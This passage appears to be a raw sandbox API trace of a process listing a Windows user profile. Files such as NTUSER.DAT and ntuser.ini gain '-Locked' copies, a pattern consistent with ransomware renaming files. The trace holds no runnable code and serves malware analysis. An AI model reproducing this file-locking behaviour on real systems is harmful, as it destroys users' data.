FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0311.482] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0311.482] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x35b5d25e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35b5d25e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0311.482] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43695fb2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x35b7a6fe, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35b7a6fe, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0311.483] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0311.483] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Start Menu", cAlternateFileName="STARTM~1")) returned 1 [0311.483] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Templates", cAlternateFileName="TEMPLA~1")) returned 1 [0311.483] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x35c9a850, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35c9a850, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0311.483] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef08 | out: lpFindFileData=0x1aef08*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x35c9a850, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35c9a850, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0311.484] FindClose (in: hFindFile=0x737a28 | out: hFindFile=0x737a28) returned 1 [0311.484] FindFirstFileW (in: lpFileName="C:\\Users\\RDhJ0CNFevzX\\*.*", lpFindFileData=0x1aef34 | out: lpFindFileData=0x1aef34*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3456e292, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3456e292, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x737a28 [0311.485] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ce179de, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3456e292, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3456e292, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0311.485] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppData", cAlternateFileName="")) returned 1 [0311.486] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Application Data", cAlternateFileName="APPLIC~1")) returned 1 [0311.486] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x435fd682, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x34666b77, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34666b77, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Contacts", cAlternateFileName="")) returned 1 [0311.486] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Cookies", cAlternateFileName="")) returned 1 [0311.487] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x39f9b77d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x39f9b77d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 1 [0311.487] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x36b6417e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36b6417e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Documents", cAlternateFileName="DOCUME~1")) returned 1 [0311.487] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ced6473, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x36c70a86, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36c70a86, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Downloads", cAlternateFileName="DOWNLO~1")) returned 1 [0311.487] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x34c1b5fa, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34c1b5fa, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Favorites", cAlternateFileName="FAVORI~1")) returned 1 [0311.487] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x34cb35ca, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34cb35ca, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0311.488] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0311.488] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3513d0c1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3513d0c1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0311.488] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d374e80, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d374e80, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d374e80, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0311.488] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0311.488] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x3ce3dbd0, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0xf3d0952f, ftLastAccessTime.dwHighDateTime=0x1d7e768, ftLastWriteTime.dwLowDateTime=0xf3d0952f, ftLastWriteTime.dwHighDateTime=0x1d7e768, nFileSizeHigh=0x0, nFileSizeLow=0x180000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0311.488] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32d4f49d, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x32d4f49d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34507af7, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT-Locked", cAlternateFileName="NTUSER~1.DAT")) returned 1 [0311.488] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3450efd6, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3450efd6, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3450efd6, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT-Locked-Locked", cAlternateFileName="NTUSER~2.DAT")) returned 1 [0311.489] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d2dc444, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d2dc444, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d2dc444, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x59400, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.dat.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0311.489] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x34532582, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x34532582, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x34532582, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.dat.LOG1-Locked", cAlternateFileName="NTUSER~3.LOG")) returned 1 [0311.489] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d2dc444, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d2dc444, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d2dc444, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x84000, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.dat.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0311.489] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3453af3e, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3453af3e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3453af3e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.dat.LOG2-Locked", cAlternateFileName="NTUSER~4.LOG")) returned 1 [0311.489] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d2dc444, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d2dc444, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x63434853, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0311.489] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x345437ce, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x345437ce, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x345437ce, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TM.blf-Locked", cAlternateFileName="NTUSER~2.BLF")) returned 1 [0311.489] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d3026e1, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d3026e1, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6340e659, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0311.490] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3454ac95, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3454ac95, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3454ac95, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000001.regtrans-ms-Locked", cAlternateFileName="NTUSER~3.REG")) returned 1 [0311.490] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x3d3026e1, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d3026e1, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x6340e659, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0311.490] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x345583f1, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x345583f1, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x345583f1, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="NTUSER.DAT{62e13464-7ee5-11e5-80c4-a4badb40df56}.TMContainer00000000000000000002.regtrans-ms-Locked", cAlternateFileName="NTUSER~4.REG")) returned 1 [0311.490] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x14, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.ini", cAlternateFileName="")) returned 1 [0311.490] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3456e292, ftCreationTime.dwHighDateTime=0x1d82250, ftLastAccessTime.dwLowDateTime=0x3456e292, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x3456e292, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ntuser.ini-Locked", cAlternateFileName="NTUSER~1.INI")) returned 1 [0311.490] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x84ac775d, ftCreationTime.dwHighDateTime=0x1d70074, ftLastAccessTime.dwLowDateTime=0x35369ed2, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35369ed2, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="OneDrive", cAlternateFileName="")) returned 1 [0311.490] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x36cc894d, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x36cc894d, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0311.490] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="PrintHood", cAlternateFileName="PRINTH~1")) returned 1 [0311.490] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Recent", cAlternateFileName="")) returned 1 [0311.491] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3ceb0231, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x35b5d25e, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35b5d25e, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Saved Games", cAlternateFileName="SAVEDG~1")) returned 1 [0311.491] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x43695fb2, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x35b7a6fe, ftLastAccessTime.dwHighDateTime=0x1d82250, ftLastWriteTime.dwLowDateTime=0x35b7a6fe, ftLastWriteTime.dwHighDateTime=0x1d82250, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Searches", cAlternateFileName="")) returned 1 [0311.491] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, ftLastWriteTime.dwLowDateTime=0x3d39b021, ftLastWriteTime.dwHighDateTime=0x1d70068, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0311.491] FindNextFileW (in: hFindFile=0x737a28, lpFindFileData=0x1aef48 | out: lpFindFileData=0x1aef48*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x3d39b021, ftCreationTime.dwHighDateTime=0x1d70068, ftLastAccessTime.dwLowDateTime=0x3d39b021, ftLastAccessTime.dwHighDateTime=0x1d70068, 